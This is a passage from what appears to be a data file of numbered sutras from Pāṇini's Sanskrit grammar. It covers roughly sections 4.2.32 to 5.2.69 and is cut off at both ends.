यत्","4.2.32::द्यावापृथिवीशुनासीरमरुत्वदग्नीषोमवास्तोष्पतिगृहमेधाच्छ च","4.2.33::अग्नेर्ढक्","4.2.34:अतिदेशः:कालेभ्यो 
भववत्","4.2.35::महाराजप्रोष्ठपदाट्ठञ्","4.2.36::पितृव्यमातुलमातामहपितामहाः","4.2.37::तस्य समूहः","4.2.38::भिक्षाऽऽदिभ्योऽण्","4.2.39::गोत्रोक्षोष्ट्रोरभ्रराजराजन्यराजपुत्रवत्समनुष्याजाद्वुञ्","4.2.40::केदाराद्यञ् च","4.2.41::ठञ् कवचिनश्च","4.2.42::ब्राह्मणमाणववाडवाद्यन्","4.2.43::ग्रामजनबन्धुसहायेभ्यः तल्","4.2.44::अनुदात्तादेरञ्","4.2.45::खण्डिकादिभ्यश्च","4.2.46:अतिदेशः:चरणेभ्यो धर्मवत्","4.2.47::अचित्तहस्तिधेनोष्ठक्","4.2.48::केशाश्वाभ्यां यञ्छावन्यतरस्याम्","4.2.49::पाशादिभ्यो यः","4.2.50::खलगोरथात्","4.2.51::इनित्रकट्यचश्च","4.2.52::विषयो देशे","4.2.53::राजन्यादिभ्यो वुञ्","4.2.54::भौरिक्याद्यैषुकार्यादिभ्यो विधल्भक्तलौ","4.2.55::सोऽस्यादिरिति च्छन्दसः प्रगाथेषु","4.2.56::संग्रामे प्रयोजनयोद्धृभ्यः","4.2.57::तदस्यां प्रहरणमिति क्रीडायाम् णः","4.2.58::घञः साऽस्यां क्रियेति ञः","4.2.59::तदधीते तद्वेद","4.2.60::क्रतूक्थादिसूत्रान्ताट्ठक्","4.2.61::क्रमादिभ्यो वुन्","4.2.62::अनुब्राह्मणादिनिः","4.2.63::वसन्तादिभ्यष्ठक्","4.2.64::प्रोक्ताल्लुक्","4.2.65::सूत्राच्च कोपधात्","4.2.66::छन्दोब्राह्मणानि च तद्विषयाणि","4.2.67::तदस्मिन्नस्तीति देशे तन्नाम्नि","4.2.68::तेन निर्वृत्तम्","4.2.69::तस्य निवासः","4.2.70::अदूरभवश्च","4.2.71::ओरञ्","4.2.72::मतोश्च बह्वजङ्गात्","4.2.73::बह्वचः कूपेषु","4.2.74::उदक् च विपाशः","4.2.75::संकलादिभ्यश्च","4.2.76::स्त्रीषु सौवीरसाल्वप्राक्षु","4.2.77::सुवास्त्वादिभ्योऽण्","4.2.78::रोणी","4.2.79::कोपधाच्च","4.2.80::वुञ्छण्कठजिलशेनिरढञ्ण्ययफक्फिञिञ्ञ्यकक्ठकोऽरीहणकृशाश्वर्श्यकुमुदकाशतृणप्रेक्षाऽश्मसखिसंकाशबलपक्षकर्णसुतंगमप्रगदिन्वराहकुमुदादिभ्यः","4.2.81::जनपदे लुप्","4.2.82::वरणादिभ्यश्च","4.2.83::शर्कराया वा","4.2.84::ठक्छौ च","4.2.85::नद्यां मतुप्","4.2.86::मध्वादिभ्यश्च","4.2.87::कुमुदनडवेतसेभ्यो ड्मतुप्","4.2.88::नडशादाड्ड्वलच्","4.2.89::शिखाया वलच्","4.2.90::उत्करादिभ्यश्छः","4.2.91::नडादीनां कुक् च","4.2.92::शेषे","4.2.93::राष्ट्रावारपाराद्घखौ","4.2.94::ग्रामाद्यखञौ","4.2.95::कत्त्र्यादिभ्यो ढकञ्","4.2.96::कुलकुक्षिग्रीवाभ्यः श्वास्यलंकारेषु","4.2.97::नद्यादिभ्यो ढक्","4.2.98::दक्षिणापश्चात्पुरसस्त्यक्","4.2.99::कापिश्याः ष्फक्","4.2.100::रंकोरमनुष्येऽण् च","4.2.101::द्युप्रागपागुदक्प्रतीचो यत्","4.2.102::कन्थायाष्ठक्","4.2.103::वर्णौ वुक्","4.2.104::अव्ययात्त्यप्","4.2.105::ऐषमोह्यःश्वसोऽन्यतरस्याम्","4.2.106::तीररूप्योत्तरपदादञ्ञौ","4.2.107::दिक्पूर्वपदादसंज्ञायां ञः","4.2.108::मद्रेभ्योऽञ्","4.2.109::उदीच्यग्रामाच्च बह्वचोऽन्तोदात्तात्","4.2.110::प्रस्थोत्तरपदपलद्यादिकोपधादण्","4.2.111::कण्वादिभ्यो गोत्रे","4.2.112::इञश्च","4.2.113::न द्व्यचः प्राच्यभरतेषु","4.2.114::वृद्धाच्छः","4.2.115::भवतष्ठक्छसौ","4.2.116::काश्यादिभ्यष्ठञ्ञिठौ","4.2.117::वाहीकग्रामेभ्यश्च","4.2.118::विभाषोशीनरेषु","4.2.119::ओर्देशे ठञ्","4.2.120::वृद्धात् प्राचाम्","4.2.121::धन्वयोपधाद्वुञ्","4.2.122::प्रस्थपुरवहान्ताच्च","4.2.123::रोपधेतोः प्राचाम्","4.2.124::जनपदतदवध्योश्च","4.2.125::अवृद्धादपि बहुवचनविषयात्","4.2.126::क्अच्छाग्निवक्त्रगर्त्तोत्तरपदात्","4.2.127::धूमादिभ्यश्च","4.2.128::नगरात् कुत्सनप्रावीण्ययोः","4.2.129::अरण्यान्मनुष्ये","4.2.130::विभाषा कुरुयुगन्धराभ्याम्","4.2.131::मद्रवृज्योः कन्","4.2.132::कोपधादण्","4.2.133::कच्छादिभ्यश्च","4.2.134::मनुष्यतत्स्थयोर्वुञ्","4.2.135::अपदातौ साल्वात्","4.2.136::गोयवाग्वोश्च","4.2.137::गर्तोत्तरपदाच्छः","4.2.138::गहादिभ्यश्च","4.2.139::प्राचां कटादेः","4.2.140::राज्ञः क च","4.2.141::वृद्धादकेकान्तखोपधात्","4.2.142::कन्थापलदनगरग्रामह्रदोत्तरपदात्","4.2.143::पर्वताच्च","4.2.144::विभाषाऽमनुष्ये","4.2.145::कृकणपर्णाद्भारद्वाजे","4.3.1::युष्मदस्मदोरन्यतरस्यां खञ् च","4.3.2::तस्मिन् नणि च युष्माकास्माकौ","4.3.3::तवकममकावेकवचने","4.3.4::अर्धाद्यत्","4.3.5::परावराधमोत्तमपूर्वाच्च","4.3.6::दिक्पूर्वपदाट्ठञ् 
च","4.3.7::ग्रामजनपदैकदेशादञ्ठञौ","4.3.8::मध्यान्मः","4.3.9::अ साम्प्रतिके","4.3.10::द्वीपादनुसमुद्रं यञ्","4.3.11::कालाट्ठञ्","4.3.12::श्राद्धे शरदः","4.3.13::विभाषा रोगातपयोः","4.3.14::निशाप्रदोषाभ्यां च","4.3.15::श्वसस्तुट् च","4.3.16::संधिवेलाऽऽद्यृतुनक्षत्रेभ्योऽण्","4.3.17::प्रावृष एण्यः","4.3.18::वर्षाभ्यष्ठक्","4.3.19::छन्दसि ठञ्","4.3.20::वसन्ताच्च","4.3.21::हेमन्ताच्च","4.3.22::सर्वत्राण् च तलोपश्च","4.3.23::सायंचिरम्प्राह्णेप्रगेऽव्ययेभ्यष्ट्युट्युलौ तुट् च","4.3.24::विभाषा पूर्वाह्णापराह्णाभ्याम्","4.3.25::तत्र जातः","4.3.26::प्रावृषष्ठप्","4.3.27::संज्ञायां शरदो वुञ्","4.3.28::पूर्वाह्णापराह्णार्द्रामूलप्रदोषावस्कराद्वुन्","4.3.29::पथः पन्थ च","4.3.30::अमावास्याया वा","4.3.31::अ च","4.3.32::सिन्ध्वपकराभ्यां कन्","4.3.33::अणञौ च","4.3.34::श्रविष्ठाफल्गुन्यनुराधास्वातितिष्यपुनर्वसुहस्तविशाखाऽषाढाबहुलाल्लुक्","4.3.35::स्थानान्तगोशालखरशालाच्च","4.3.36::वत्सशालाऽभिजिदश्वयुक्छतभिषजो वा","4.3.37::नक्षत्रेभ्यो बहुलम्","4.3.38::कृतलब्धक्रीतकुशलाः","4.3.39::प्रायभवः","4.3.40::उपजानूपकर्णोपनीवेष्ठक्","4.3.41::संभूते","4.3.42::कोशाड्ढञ्","4.3.43::कालात् साधुपुष्प्यत्पच्यमानेषु","4.3.44::उप्ते च","4.3.45::आश्वयुज्या वुञ्","4.3.46::ग्रीष्मवसन्तादन्यतरस्याम्","4.3.47::देयमृणे","4.3.48::कलाप्यश्वत्थयवबुसाद्वुन्","4.3.49::ग्रीष्मावरसमाद्वुञ्","4.3.50::संवत्सराग्रहायणीभ्यां ठञ् च","4.3.51::व्याहरति मृगः","4.3.52::तदस्य सोढम्","4.3.53::तत्र भवः","4.3.54::दिगादिभ्यो यत्","4.3.55::शरीरावयवाच्च","4.3.56::दृतिकुक्षिकलशिवस्त्यस्त्यहेर्ढञ्","4.3.57::ग्रीवाभ्योऽण् च","4.3.58::गम्भीराञ्ञ्यः","4.3.59::अव्ययीभावाच्च","4.3.60::अन्तःपूर्वपदाट्ठञ्","4.3.61::ग्रामात् पर्यनुपूर्वात्","4.3.62::जिह्वामूलाङ्गुलेश्छः","4.3.63::वर्गान्ताच्च","4.3.64::अशब्दे यत्खावन्यतरस्याम्","4.3.65::कर्णललाटात् कनलंकारे","4.3.66::तस्य व्याख्यान इति च व्याख्यातव्यनाम्नः","4.3.67::बह्वचोऽन्तोदात्ताट्ठञ्","4.3.68::क्रतुयज्ञेभ्यश्च","4.3.69::अध्यायेष्वेवर्षेः","4.3.70::पौरोडाशपुरोडाशात् ष्ठन्","4.3.71::छन्दसो यदणौ","4.3.72::द्व्यजृद्ब्राह्मणर्क्प्रथमाध्वरपुरश्चरणनामाख्याताट्ठक्","4.3.73::अणृगयनादिभ्यः","4.3.74::तत आगतः","4.3.75::ठगायस्थानेभ्यः","4.3.76::शुण्डिकादिभ्योऽण्","4.3.77::विद्यायोनिसंबन्धेभ्यो वुञ्","4.3.78::ऋतष्ठञ्","4.3.79::पितुर्यच्च","4.3.80::गोत्रादङ्कवत्","4.3.81::हेतुमनुष्येभ्योऽन्यतरस्यां रूप्यः","4.3.82::मयट् च","4.3.83::प्रभवति","4.3.84::विदूराञ्ञ्यः","4.3.85::तद्गच्छति पथिदूतयोः","4.3.86::अभिनिष्क्रामति द्वारम्","4.3.87::अधिकृत्य कृते ग्रन्थे","4.3.88::शिशुक्रन्दयमसभद्वंद्वेन्द्रजननादिभ्यश्छः","4.3.89::सोऽस्य निवासः","4.3.90::अभिजनश्च","4.3.91::आयुधजीविभ्यश्छः पर्वते","4.3.92::शण्डिकादिभ्यो ञ्यः","4.3.93::सिन्धुतक्षशिलाऽऽदिभ्योऽणञौ","4.3.94::तूदीशलातुरवर्मतीकूचवाराड्ढक्छण्ढञ्यकः","4.3.95::भक्तिः","4.3.96::अचित्ताददेशकालाट्ठक्","4.3.97::महाराजाट्ठञ्","4.3.98::वासुदेवार्जुनाभ्यां वुन्","4.3.99::गोत्रक्षत्रियाख्येभ्यो बहुलं वुञ्","4.3.100::जनपदिनां जनपदवत् सर्वं जनपदेन समानशब्दानां बहुवचने","4.3.101::तेन प्रोक्तम्","4.3.102::तित्तिरिवरतन्तुखण्डिकोखाच्छण्","4.3.103::काश्यपकौशिकाभ्यामृषिभ्यां णिनिः","4.3.104::कलापिवैशम्पायनान्तेवासिभ्यश्च","4.3.105::पुराणप्रोक्तेषु ब्राह्मणकल्पेषु","4.3.106::शौनकादिभ्यश्छन्दसि","4.3.107::कठचरकाल्लुक्","4.3.108::कलापिनोऽण्","4.3.109::छगलिनो ढिनुक्","4.3.110::पाराशर्यशिलालिभ्यां भिक्षुनटसूत्रयोः","4.3.111::कर्मन्दकृशाश्वादिनिः","4.3.112::तेनैकदिक्","4.3.113::तसिश्च","4.3.114::उरसो यच्च","4.3.115::उपज्ञाते","4.3.116::कृते ग्रन्थे","4.3.117::संज्ञायाम्","4.3.118::कुलालादिभ्यो वुञ्","4.3.119::क्षुद्राभ्रमरवटरपादपादञ्","4.3.120::तस्येदम्","4.3.121::रथाद्यत्","4.3.122::पत्त्रपूर्वादञ्","4.3.123::पत्त्राध्वर्युपरिषदश्च","4.3.124::हलसीराट्ठक्","4.3.125::द्वंद्वाद्वुन् 
वैरमैथुनिकयोः","4.3.126::गोत्रचरणाद्वुञ्","4.3.127::संघाङ्कलक्षणेष्वञ्यञिञामण्","4.3.128::शाकलाद्वा","4.3.129::छन्दोगौक्थिकयाज्ञिकबह्वृचनटाञ्ञ्यः","4.3.130::न दण्डमाणवान्तेवासिषु","4.3.131::रैवतिकादिभ्यश्छः","4.3.132::कौपिञ्जलहास्तिपदादण्","4.3.133::आथर्वणिकस्येकलोपश्च","4.3.134::तस्य विकारः","4.3.135::अवयवे च प्राण्योषधिवृक्षेभ्यः","4.3.136::बिल्वादिभ्योऽण्","4.3.137::कोपधाच्च","4.3.138::त्रपुजतुनोः षुक्","4.3.139::ओरञ्","4.3.140::अनुदात्तादेश्च","4.3.141::पलाशादिभ्यो वा","4.3.142::शम्याष्ट्लञ्","4.3.143::मयड्वैतयोर्भाषायामभक्ष्याच्छादनयोः","4.3.144::नित्यं वृद्धशरादिभ्यः","4.3.145::गोश्च पुरीषे","4.3.146::पिष्टाच्च","4.3.147::संज्ञायां कन्","4.3.148::व्रीहेः पुरोडाशे","4.3.149::असंज्ञायां तिलयवाभ्याम्","4.3.150::द्व्यचश्छन्दसि","4.3.151::नोत्वद्वर्ध्रबिल्वात्","4.3.152::तालादिभ्योऽण्","4.3.153::जातरूपेभ्यः परिमाणे","4.3.154::प्राणिरजतादिभ्योऽञ्","4.3.155::ञितश्च तत्प्रत्ययात्","4.3.156::क्रीतवत् परिमाणात्","4.3.157::उष्ट्राद्वुञ्","4.3.158::उमोर्णयोर्वा","4.3.159::एण्या ढञ्","4.3.160::गोपयसोर्यत्","4.3.161::द्रोश्च","4.3.162::माने वयः","4.3.163::फले लुक्","4.3.164::प्लक्षादिभ्योऽण्","4.3.165::जम्ब्वा वा","4.3.166::लुप् च","4.3.167::हरीतक्यादिभ्यश्च","4.3.168::कंसीयपरशव्ययोर्यञञौ लुक् च","4.4.1:अधिकारः:प्राग्वहतेष्ठक्","4.4.2::तेन दीव्यति खनति जयति जितम्","4.4.3::संस्कृतम्","4.4.4::कुलत्थकोपधादण्","4.4.5::तरति","4.4.6::गोपुच्छाट्ठञ्","4.4.7::नौद्व्यचष्ठन्","4.4.8::चरति","4.4.9::आकर्षात् ष्ठल्","4.4.10::पर्पादिभ्यः ष्ठन्","4.4.11::श्वगणाट्ठञ्च","4.4.12::वेतनादिभ्यो जीवति","4.4.13::वस्नक्रयविक्रयाट्ठन्","4.4.14::आयुधाच्छ च","4.4.15::हरत्युत्सङ्गादिभ्यः","4.4.16::भस्त्राऽऽदिभ्यः ष्ठन्","4.4.17::विभाषा विवधवीवधात्","4.4.18::अण् कुटिलिकायाः","4.4.19::निर्वृत्तेऽक्षद्यूतादिभ्यः","4.4.20::क्त्रेर्मम् नित्यं","4.4.21::अपमित्ययाचिताभ्यां कक्कनौ","4.4.22::संसृष्टे","4.4.23::चूर्णादिनिः","4.4.24::लवणाल्लुक्","4.4.25::मुद्गादण्","4.4.26::व्यञ्जनैरुपसिक्ते","4.4.27::ओजस्सहोऽम्भसा वर्तते","4.4.28::तत् प्रत्यनुपूर्वमीपलोमकूलम्","4.4.29::परिमुखं च","4.4.30::प्रयच्छति गर्ह्यम्","4.4.31::कुसीददशैकादशात् ष्ठन्ष्ठचौ","4.4.32::उञ्छति","4.4.33::रक्षति","4.4.34::शब्ददर्दुरं करोति","4.4.35::पक्षिमत्स्यमृगान् हन्ति","4.4.36::परिपन्थं च तिष्ठति","4.4.37::माथोत्तरपदपदव्यनुपदं धावति","4.4.38::आक्रन्दाट्ठञ्च","4.4.39::पदोत्तरपदं गृह्णाति","4.4.40::प्रतिकण्ठार्थललामं च","4.4.41::धर्मं चरति","4.4.42::प्रतिपथमेति ठंश्च","4.4.43::समवायान् समवैति","4.4.44::परिषदो ण्यः","4.4.45::सेनाया वा","4.4.46::संज्ञायां ललाटकुक्कुट्यौ पश्यति","4.4.47::तस्य धर्म्यम्","4.4.48::अण् महिष्यादिभ्यः","4.4.49::ऋतोऽञ्","4.4.50::अवक्रयः","4.4.51::तदस्य पण्यम्","4.4.52::लवणाट्ठञ्","4.4.53::किशरादिभ्यः ष्ठन्","4.4.54::शलालुनोऽन्यतरस्याम्","4.4.55::शिल्पम्","4.4.56::मड्डुकझर्झरादणन्यतरस्याम्","4.4.57::प्रहरणम्","4.4.58::परश्वधाट्ठञ्च","4.4.59::शक्तियष्ट्योरीकक्","4.4.60::अस्तिनास्तिदिष्टं मतिः","4.4.61::शीलम्","4.4.62::छत्रादिभ्यो णः","4.4.63::कर्माध्ययने वृत्तम्","4.4.64::बह्वच्पूर्वपदाट्ठच्","4.4.65::हितं भक्षाः","4.4.66::तदस्मै दीयते नियुक्तम्","4.4.67::श्राणामांसौदनाट्टिठन्","4.4.68::भक्तादणन्यतरस्याम्","4.4.69::तत्र नियुक्तः","4.4.70::अगारान्ताट्ठन्","4.4.71::अध्यायिन्यदेशकालात्","4.4.72::कठिनान्तप्रस्तारसंस्थानेषु व्यवहरति","4.4.73::निकटे वसति","4.4.74::आवसथात् ष्ठल्","4.4.75:अधिकारः:प्राग्घिताद्यत्","4.4.76::तद्वहति रथयुगप्रासङ्गम्","4.4.77::धुरो यड्ढकौ","4.4.78::खः सर्वधुरात्","4.4.79::एकधुराल्लुक् च","4.4.80::शकटादण्","4.4.81::हलसीराट्ठक्","4.4.82::संज्ञायां जन्याः","4.4.83::विध्यत्यधनुषा","4.4.84::धनगणं लब्धा","4.4.85::अन्नाण्णः","4.4.86::वशं गतः","4.4.87::पदमस्मिन् दृश्यम्","4.4.88::मूलमस्याबर्हि","4.4.89::संज्ञायां 
धेनुष्या","4.4.90::गृहपतिना संयुक्ते ञ्यः","4.4.91::नौवयोधर्मविषमूलमूलसीतातुलाभ्यस्तार्यतुल्यप्राप्यवध्यानाम्यसमसमितसम्मितेषु","4.4.92::धर्मपथ्यर्थन्यायादनपेते","4.4.93::छन्दसो निर्मिते","4.4.94::उरसोऽण् च","4.4.95::हृदयस्य प्रियः","4.4.96::बन्धने चर्षौ","4.4.97::मतजनहलात् करणजल्पकर्षेषु","4.4.98::तत्र साधुः","4.4.99::प्रतिजनादिभ्यः खञ्","4.4.100::भक्ताण्णः","4.4.101::परिषदो ण्यः","4.4.102::कथाऽऽदिभ्यष्ठक्","4.4.103::गुडादिभ्यष्ठञ्","4.4.104::पथ्यतिथिवसतिस्वपतेर्ढञ्","4.4.105::सभाया यः","4.4.106::ढश्छन्दसि","4.4.107::समानतीर्थे वासी","4.4.108::समानोदरे शयित ओ चोदात्तः","4.4.109::सोदराद्यः","4.4.110::भवे छन्दसि","4.4.111::पाथोनदीभ्यां ड्यण्","4.4.112::वेशन्तहिमवद्भ्यामण्","4.4.113::स्रोतसो विभाषा ड्यड्ड्यौ","4.4.114::सगर्भसयूथसनुताद्यन्","4.4.115::तुग्राद्घन्","4.4.116::अग्राद्यत्","4.4.117::घच्छौ च","4.4.118::समुद्राभ्राद्घः","4.4.119::बर्हिषि दत्तम्","4.4.120::दूतस्य भागकर्मणी","4.4.121::रक्षोयातूनां हननी","4.4.122::रेवतीजगतीहविष्याभ्यः प्रशस्ये","4.4.123::असुरस्य स्वम्","4.4.124::मायायामण्","4.4.125::तद्वानासामुपधानो मन्त्र इतीष्टकासु लुक् च मतोः","4.4.126::अश्विमानण्","4.4.127::वयस्यासु मूर्ध्नो मतुप्","4.4.128::मत्वर्थे मासतन्वोः","4.4.129::मधोर्ञ च","4.4.130::ओजसोऽहनि यत्खौ","4.4.131::वेशोयशआदेर्भगाद्यल्","4.4.132::ख च","4.4.133::पूर्वैः कृतमिनियौ च","4.4.134::अद्भिः संस्कृतम्","4.4.135::सहस्रेण संमितौ घः","4.4.136::मतौ च","4.4.137::सोममर्हति यः","4.4.138::मये च","4.4.139::मधोः","4.4.140::वसोः समूहे च","4.4.141::नक्षत्राद्घः","4.4.142::सर्वदेवात् तातिल्","4.4.143::शिवशमरिष्टस्य करे","4.4.144::भावे च","5.1.1:अधिकारः:प्राक् क्रीताच्छः","5.1.2::उगवादिभ्योऽत्","5.1.3::कम्बलाच्च संज्ञायाम्","5.1.4::विभाषा हविरपूपादिभ्यः","5.1.5::तस्मै हितम्","5.1.6::शरीरावयवाद्यत्","5.1.7::खलयवमाषतिलवृषब्रह्मणश्च","5.1.8::अजाविभ्यां थ्यन्","5.1.9::आत्मन्विश्वजनभोगोत्तरपदात् खः","5.1.10::सर्वपुरुषाभ्यां णढञौ","5.1.11::माणवचरकाभ्यां खञ्","5.1.12::तदर्थं विकृतेः प्रकृतौ","5.1.13::छदिरुपधिबलेः ढञ्","5.1.14::ऋषभोपानहोर्ञ्यः","5.1.15::चर्म्मणोऽञ्","5.1.16::तदस्य तदस्मिन् स्यादिति","5.1.17::परिखाया ढञ्","5.1.18:अधिकारः:प्राग्वतेष्ठञ्","5.1.19:अधिकारः:आर्हादगोपुच्छसंख्यापरिमाणाट्ठक्","5.1.20::असमासे निष्कादिभ्यः","5.1.21::शताच्च ठन्यतावशते","5.1.22::संख्याया अतिशदन्तायाः कन्","5.1.23::वतोरिड्वा","5.1.24::विंशतित्रिंशद्भ्यां ड्वुन्नसंज्ञायाम्","5.1.25::कंसाट्टिठन्","5.1.26::शूर्पादञन्यतरस्याम्","5.1.27::शतमानविंशतिकसहस्रवसनादण्","5.1.28::अध्यर्धपूर्वद्विगोर्लुगसंज्ञायाम्","5.1.29::विभाषा कार्षापणसहस्राभ्याम्","5.1.30::द्वित्रिपूर्वान्निष्कात्","5.1.31::बिस्ताच्च","5.1.32::विंशतिकात् खः","5.1.33::खार्या ईकन्","5.1.34::पणपादमाषशतादत्","5.1.35::शाणाद्वा","5.1.36::द्वित्रिपूर्वादण् च","5.1.37::तेन क्रीतम्","5.1.38::तस्य निमित्तं संयोगोत्पातौ","5.1.39::गोद्व्यचोरसंख्यापरिमाणाश्वादेर्यत्","5.1.40::पुत्राच्छ च","5.1.41::सर्वभूमिपृथिवीभ्यामणञौ","5.1.42::तस्येश्वरः","5.1.43::तत्र विदित इति च","5.1.44::लोकसर्वलोकाट्ठञ्","5.1.45::तस्य वापः","5.1.46::पात्रात् ष्ठन्","5.1.47::तदस्मिन् वृद्ध्यायलाभशुल्कोपदा दीयते","5.1.48::पूरणार्धाट्ठन्","5.1.49::भागाद्यच्च","5.1.50::तद्धरति वहत्यावहति भाराद्वंशादिभ्यः","5.1.51::वस्नद्रव्याभ्यां ठन्कनौ","5.1.52::सम्भवत्यवहरति पचति","5.1.53::आढकाचितपात्रात् खोऽन्यतरयाम्","5.1.54::द्विगोष्ठंश्च","5.1.55::कुलिजाल्लुक्खौ च","5.1.56::सोऽस्यांशवस्नभृतयः","5.1.57::तदस्य परिमाणम्","5.1.58::संख्यायाः संज्ञासंघसूत्राध्ययनेषु","5.1.59::पङ्क्तिविंशतित्रिंशत्चत्वारिंशत्पञ्चाशत्षष्टिसप्तत्यशीतिनवतिशतम्","5.1.60::पञ्चद्दशतौ वर्गे वा","5.1.61::सप्तनोऽञ् छन्दसि","5.1.62::त्रिंशच्चत्वारिंशतोर्ब्राह्मणे संज्ञायां डण्","5.1.63::तद् अर्हति","5.1.64::छेदादिभ्यो 
नित्यम्","5.1.65::शीर्षच्छेदाद्यच्च","5.1.66::दण्डादिभ्यः","5.1.67::छन्दसि च","5.1.68::पात्राद्घंश्च","5.1.69::कडङ्गरदक्षिणाच्छ च","5.1.70::स्थालीबिलात्","5.1.71::यज्ञर्त्विग्भ्यां घखञौ","5.1.72::पारायणतुरायणचान्द्रायणं वर्तयति","5.1.73::संशयमापन्नः","5.1.74::योजनं गच्छति","5.1.75::पथः ष्कन्","5.1.76::पन्थो ण नित्यम्","5.1.77::उत्तरपथेनाहृतं च","5.1.78:अधिकारः:कालात्","5.1.79::तेन निर्वृत्तम्","5.1.80::तमधीष्टो भृतो भूतो भावी","5.1.81::मासाद्वयसि यत्खञौ","5.1.82::द्विगोर्यप्","5.1.83::षण्मासाण्ण्यच्च","5.1.84::अवयसि ठंश्च","5.1.85::समायाः खः","5.1.86::द्विगोर्वा","5.1.87::रात्र्यहस्संवत्सराच्च","5.1.88::वर्षाल्लुक् च","5.1.89::चित्तवति नित्यम्","5.1.90::षष्टिकाः षष्टिरात्रेण पच्यन्ते","5.1.91::वत्सरान्ताच्छश्छन्दसि","5.1.92::सम्परिपूर्वात् ख च","5.1.93::तेन परिजय्यलभ्यकार्यसुकरम्","5.1.94::तदस्य ब्रह्मचर्यम्","5.1.95::तस्य च दक्षिणा यज्ञाख्येभ्यः","5.1.96::तत्र च दीयते कार्यं भववत्","5.1.97::व्युष्टादिभ्योऽण्","5.1.98::तेन यथाकथाचहस्ताभ्यां णयतौ","5.1.99::सम्पादिनि","5.1.100::कर्मवेषाद्यत्","5.1.101::तस्मै प्रभवति संतापादिभ्यः","5.1.102::योगाद्यच्च","5.1.103::कर्मण उकञ्","5.1.104::समयस्तदस्य प्राप्तम्","5.1.105::ऋतोरण्","5.1.106::छन्दसि घस्","5.1.107::कालाद्यत्","5.1.108::प्रकृष्टे ठञ्","5.1.109::प्रयोजनम्","5.1.110::विशाखाऽऽषाढादण् मन्थदण्डयोः","5.1.111::अनुप्रवचनादिभ्यश्छः","5.1.112::समापनात् सपूर्वपदात्","5.1.113::ऐकागारिकट् चौरे","5.1.114::आकालिकडाद्यन्तवचने","5.1.115::तेन तुल्यं क्रिया चेद्वतिः","5.1.116::तत्र तस्येव","5.1.117::तदर्हम्","5.1.118::उपसर्गाच्छन्दसि धात्वर्थे","5.1.119::तस्य भावस्त्वतलौ","5.1.120:अधिकारः:आ च त्वात्","5.1.121::न नञ्पूर्वात्तत्पुरुषादचतुरसंगतलवणवटयुधकतरसलसेभ्यः","5.1.122::पृथ्वादिभ्य इमनिज्वा","5.1.123::वर्णदृढादिभ्यः ष्यञ् च","5.1.124::गुणवचनब्राह्मणादिभ्यः कर्मणि च","5.1.125::स्तेनाद्यन्नलोपश्च","5.1.126::सख्युर्यः","5.1.127::कपिज्ञात्योर्ढक्","5.1.128::पत्यन्तपुरोहितादिभ्यो यक्","5.1.129::प्राणभृज्जातिवयोवचनोद्गात्रादिभ्योऽञ्","5.1.130::हायनान्तयुवादिभ्योऽण्","5.1.131::इगन्ताच्च लघुपूर्वात्","5.1.132::योपधाद्गुरूपोत्तमाद्वुञ्","5.1.133::द्वंद्वमनोज्ञादिभ्यश्च","5.1.134::गोत्रचरणाच्श्लाघाऽत्याकारतदवेतेषु","5.1.135::होत्राभ्यश्छः","5.1.136::ब्रह्मणस्त्वः","5.2.1::धान्यानां भवने क्षेत्रे खञ्","5.2.2::व्रीहिशाल्योर्ढक्","5.2.3::यवयवकषष्टिकादत्","5.2.4::विभाषा तिलमाषोमाभङ्गाऽणुभ्यः","5.2.5::सर्वचर्मणः कृतः खखञौ","5.2.6::यथामुखसंमुखस्य दर्शनः खः","5.2.7::तत्सर्वादेः पथ्यङ्गकर्मपत्रपात्रं व्याप्नोति","5.2.8::आप्रपदं प्राप्नोति","5.2.9::अनुपदसर्वान्नायानयं बद्धाभक्षयतिनेयेषु","5.2.10::परोवरपरम्परपुत्रपौत्रमनुभवति","5.2.11::अवारपारात्यन्तानुकामं गामी","5.2.12::समांसमां विजायते","5.2.13::अद्यश्वीनाऽवष्टब्धे","5.2.14::आगवीनः","5.2.15::अनुग्वलंगामी","5.2.16::अध्वनो यत्खौ","5.2.17::अभ्यमित्राच्छ च","5.2.18::गोष्ठात् खञ् भूतपूर्वे","5.2.19::अश्वस्यैकाहगमः","5.2.20::शालीनकौपीने अधृष्टाकार्ययोः","5.2.21::व्रातेन जीवति","5.2.22::साप्तपदीनं सख्यम्","5.2.23::हैयंगवीनं संज्ञायाम्","5.2.24::तस्य पाकमूले पील्वदिकर्णादिभ्यः कुणब्जाहचौ","5.2.25::पक्षात्तिः","5.2.26::तेन वित्तश्चुञ्चुप्चणपौ","5.2.27::विनञ्भ्यां नानाञौ नसह","5.2.28::वेः शालच्छङ्कटचौ","5.2.29::सम्प्रोदश्च कटच्","5.2.30::अवात् कुटारच्च","5.2.31::नते नासिकायाः संज्ञायां टीटञ्नाटज्भ्राटचः","5.2.32::नेर्बिडज्बिरीसचौ","5.2.33::इनच्पिटच्चिकचि च","5.2.34::उपाधिभ्यां त्यकन्नासन्नारूढयोः","5.2.35::कर्मणि घटोऽठच्","5.2.36::तदस्य संजातं तारकाऽऽदिभ्य इतच्","5.2.37::प्रमाणे द्वयसज्दघ्नञ्मात्रचः","5.2.38::पुरुषहस्तिभ्यामण् च","5.2.39::यद्तदेतेभ्यः परिमाणे वतुप्","5.2.40::किमिदंभ्यां वो घः","5.2.41::किमः संख्यापरिमाणे डति च","5.2.42::संख्याया अवयवे तयप्","5.2.43::द्वित्रिभ्यां तयस्यायज्वा","5.2.44::उभादुदात्तो 
नित्यम्","5.2.45::तदस्मिन्नधिकमिति दशान्ताड्डः","5.2.46::शदन्तविंशतेश्च","5.2.47::संख्याया गुणस्य निमाने मयट्","5.2.48::तस्य पूरणे डट्","5.2.49::नान्तादसंख्याऽऽदेर्मट्","5.2.50::थट् च च्छन्दसि","5.2.51::षट्कतिकतिपयचतुरां थुक्","5.2.52::बहुपूगगणसंघस्य तिथुक्","5.2.53::वतोरिथुक्","5.2.54::द्वेस्तीयः","5.2.55::त्रेः सम्प्रसारणम् च","5.2.56::विंशत्यादिभ्यस्तमडन्यतरस्याम्","5.2.57::नित्यं शतादिमासार्धमाससंवत्सराच्च","5.2.58::षष्ट्यादेश्चासंख्याऽऽदेः","5.2.59::मतौ च्छः सूक्तसाम्नोः","5.2.60::अध्यायानुवाकयोर्लुक्","5.2.61::विमुक्तादिभ्योऽण्","5.2.62::गोषदादिभ्यो वुन्","5.2.63::तत्र कुशलः पथः","5.2.64::आकर्षादिभ्यः कन्","5.2.65::धनहिरण्यात् कामे","5.2.66::स्वाङ्गेभ्यः प्रसिते","5.2.67::उदराट्ठगाद्यूने","5.2.68::सस्येन परिजातः","5.2.69::अंशं 